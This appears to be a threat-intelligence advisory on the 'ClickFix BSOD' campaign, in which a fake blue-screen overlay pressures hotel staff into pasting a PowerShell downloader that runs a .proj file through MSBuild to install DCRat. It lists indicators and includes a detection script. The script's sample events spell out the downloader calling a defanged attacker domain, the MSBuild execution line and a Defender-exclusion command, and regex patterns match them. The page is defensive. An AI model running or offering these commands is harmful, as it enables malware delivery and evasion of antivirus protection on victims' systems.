DomainGuard

ClickFix BSOD (Fake Blue Screen of Death)

An aggressive variant of the ClickFix technique that uses a fake Windows Blue Screen of Death (BSOD) overlay to pressure victims into executing malicious PowerShell commands via MSBuild.

A fake Windows Blue Screen of Death (BSOD) overlay used to trick victims into running malicious commands.
First seen: 2026
Status: Active in the wild
Tags: ClickFix, BSOD, PowerShell, MSBuild, DCRat, Social Engineering

What it is

ClickFix BSOD is a high-pressure evolution of the ClickFix social engineering technique. While standard ClickFix lures often mimic browser updates or CAPTCHA checks, the BSOD variant leverages a fake Windows Blue Screen of Death (BSOD) to create a sense of critical system failure.

The attack primarily targets the hospitality and travel sectors, often impersonating brands like Booking.com. Victims are led to believe their system has crashed or their browser is incompatible, and they are provided with a “fix” that involves pasting a malicious command into their terminal. This technique is designed to bypass traditional web security controls by having the user manually initiate the malware delivery.

How it works

  1. Travel-Themed Lure. The attack often begins with a phishing email impersonating a travel platform (e.g., Booking.com) sent to hotel or property management staff. The email claims there is an urgent issue with a reservation that requires immediate attention.

  2. Urgency-Driven Landing Page. Clicking the link leads to a phishing site (e.g., low-house[.]com) that reinforces the pressure with messages like “YOUR RESERVATION WILL BE CANCELLED.”

  3. Fake BSOD Overlay. The site triggers a full-screen overlay that mimics a Windows BSOD. The overlay displays a QR code and a set of instructions to “restore the system.”

    Fake Windows BSOD overlay displaying fraudulent recovery instructions.
  4. The “Fix” Instruction. The victim is instructed to open the Windows Run dialog (Win+R), paste a pre-copied command, and press Enter. This command is a PowerShell downloader.

  5. MSBuild Proxy Execution. The pasted PowerShell command downloads a malicious Microsoft Build Engine (.proj) file from an attacker-controlled server (e.g., 2fa-bns[.]com). It then executes this file using MSBuild.exe:

    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe v.proj
  6. Malware Deployment. By using MSBuild.exe, the attackers can bypass many endpoint security policies that restrict direct PowerShell or script execution. The .proj file contains inline code that:

    • Configures Microsoft Defender exclusions for the malware’s working directory.
    • Establishes persistence on the host.
    • Downloads and executes the final payload, typically DCRat (a remote access trojan).

Why it still works

  • High-Stakes Context. By targeting hotel staff with reservation cancellations, attackers ensure the victim is in a reactive, high-stress state.
  • System-Level Authority. A BSOD is one of the most recognized and feared system errors. The victim’s focus shifts from “is this website real?” to “my computer is broken.”
  • Living-off-the-Land (LotL). Using MSBuild.exe to execute the payload is a classic LotL technique. Since MSBuild is a legitimate Microsoft tool, its execution is often trusted by default, and it can be used to run malicious code without a dedicated binary being caught by traditional AV signatures.

Signals to watch for

  • Browser-Based BSODs. A real Windows BSOD will never occur inside a web browser window. If you can see browser UI elements or if the BSOD disappears when you close the tab, it is a scam.
  • Instructions to use MSBuild. Legitimate technical support will almost never ask a user to run MSBuild.exe via the Run dialog to fix a system error.
  • Unusual Domain Chains. Watch for traffic to randomized or unrelated domains (e.g., 8eh18dhq9wd[.]click) used to host the initial lure or the second-stage .proj files.
  • Defender Exclusions. Any process attempting to add widespread exclusions to Microsoft Defender via PowerShell or registry edits is a major red flag.
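The three host-side signals above (MSBuild proxy execution of a .proj, a downloader fetching a .proj over HTTP, and Defender exclusion changes) can be turned into simple process-creation rules. The script below is an added example, not DomainGuard's tooling; the events are constructed Sysmon-style records with invented paths and user names, the domain is kept in the defanged form used on this page, and the parent-process allow-list is an assumption about what a normal build chain looks like.

```python
import re

# Constructed Sysmon-style process-creation events; not real telemetry.
# Paths and user names are invented; the defanged domain and v.proj come from the write-up.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",   # Run dialog (Win+R) children are spawned by explorer.exe
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell -w hidden -c "iwr https://2fa-bns[.]com/v.proj -OutFile $env:TEMP\v.proj"'},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "cmdline": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Users\staff\AppData\Local\Temp\v.proj"},
    {"parent": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell Add-MpPreference -ExclusionPath C:\Users\staff\AppData\Local\Temp"},
    {"parent": r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe",
     "image": r"C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe",
     "cmdline": r"MSBuild.exe C:\src\app\app.csproj /t:Build"},   # benign developer build
]

# Assumed allow-list: parents from which MSBuild normally runs in a build; anything else is suspect.
BUILD_PARENTS = ("devenv.exe", "dotnet.exe", "msbuild.exe", "vbcscompiler.exe")

PROJ_ARG = re.compile(r"\.(proj|csproj|vbproj|xml)\b", re.IGNORECASE)
REMOTE_PROJ = re.compile(r"https?://\S+\.proj", re.IGNORECASE)
DEFENDER_EXCL = re.compile(r"Add-MpPreference\s+-Exclusion(Path|Process|Extension)", re.IGNORECASE)
DEFENDER_REG = re.compile(r"Windows Defender\\Exclusions", re.IGNORECASE)

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return the list of rule names the event triggers (empty for benign)."""
    hits = []
    parent, image, cmd = basename(event["parent"]), basename(event["image"]), event["cmdline"]
    if image == "msbuild.exe" and PROJ_ARG.search(cmd) and parent not in BUILD_PARENTS:
        hits.append("msbuild_proxy_execution")      # MSBuild launched outside a build tool chain
    if REMOTE_PROJ.search(cmd):
        hits.append("remote_proj_download")         # downloader fetching a .proj from the web
    if DEFENDER_EXCL.search(cmd) or DEFENDER_REG.search(cmd):
        hits.append("defender_exclusion_change")    # payload carving out an AV exclusion
    return hits

def scan(events):
    """Map event index -> triggered rules, omitting events with no hits."""
    return {i: h for i, e in enumerate(events) if (h := classify(e))}

if __name__ == "__main__":
    for i, rules in scan(SAMPLE_EVENTS).items():
        print(i, basename(SAMPLE_EVENTS[i]["image"]), rules)
```

Correlating the three hits on one host within a few minutes (PowerShell under explorer.exe, then MSBuild with a .proj in a user-writable path, then an exclusion change) is what separates this chain from a lone developer build.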

Why it appears here

The ClickFix BSOD variant represents a significant shift toward more aggressive, high-friction social engineering. It demonstrates how attackers are moving away from subtle deception toward overt system-error mimicry to force user compliance. We track this campaign because it specifically targets the travel industry and uses advanced proxy-execution techniques that bypass standard security stacks.

Indicators of compromise

Domains

  • low-house[.]com (Initial phishing/BSOD host)
  • 2fa-bns[.]com (Payload delivery)
  • 8eh18dhq9wd[.]click
  • oncameraworkout[.]com
  • asj77[.]com / asj88[.]com / asj99[.]com
  • wmk77[.]com

Technical Indicators

  • Process execution: MSBuild.exe being spawned with a local or remote .proj file path as an argument.
  • Payload file: v.proj (or similar variants).
  • Final Malware: DCRat (Infostealer and RAT capabilities).